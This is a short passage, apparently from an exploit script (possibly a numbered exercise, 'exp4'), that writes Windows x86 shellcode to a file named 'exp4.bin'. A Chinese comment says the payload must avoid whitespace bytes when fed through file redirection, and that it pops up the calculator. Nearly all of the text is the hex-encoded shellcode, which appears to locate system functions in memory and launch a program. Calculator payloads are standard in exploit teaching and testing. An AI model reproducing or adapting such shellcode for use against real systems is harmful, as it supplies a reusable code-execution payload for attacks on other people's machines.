
如果从文件进行重定向输入：shellcode不能包含\x09 \x0a \xb \x0c \x0d \x20等字符

$shellcode功能：弹出计算器


*/

$file = "exp4.bin";
$shellcode = 
"\x55\x8b\xec\x33\xc0\x50\x68\x63\x61\x6c\x63\x50\x68\x78\x65\x63".
"\x3f\x88\x44\x24\x03\x68\x57\x69\x6e\x45\x50\x68\x65\x6c\x33\x32".
"\x68\x6b\x65\x72\x6e\x64\x8b\x50\x30\xb8\x2d\x00\x00\x00\x83\xe8".
"\x21\x8b\x14\x02\x83\xc2\x1c\x8b\xc2\x33\xc9\x8b\x14\x11\x3b\xc2".
"\x0f\x84\x8a\x00\x00\x00\xbf\x21\x00\x00\x00\x4f\x8b\x34\x3a\x8b".
"\xfc\xb1\x08\x8a\x44\x4e\xfe\x8a\x5c\x0f\xff\xfe\xc9\x3a\xc3\x74".
"\xf2\x80\xf9\xff\x75\xd3\x8b\x42\x08\x8b\x52\x08\x03\x40\x3c\x8b".
"\x40\x78\x03\xc2\xb9\x21\x00\x00\x00\x49\x8b\x1c\x08\x13\xda\x8b".
"\x48\x18\x8b\x3b\x03\xfa\xbe\x2d\x00\x00\x00\x83\xee\x21\x8d\x34".
"\x34\x51\xb1\x08\xf3\xa6\x84\xc9\x59\x74\x07\x83\xc3\x04\xe2\xe2".
"\xeb\x2e\x2b\xda\xb9\x21\x00\x00\x00\x49\x2b\x1c\x08\xd1\xeb\x03".
"\x58\x24\x03\xda\x43\x0f\xb7\x4b\xff\xc1\xe1\x02\x03\x48\x1c\x03".
"\xca\x41\x8b\x49\xff\x03\xca\x8d\x5c\x24\x18\x6a\x01\x53\xff\xd1".
"\x83\xc4\x21\x4c\x5d\xc3";
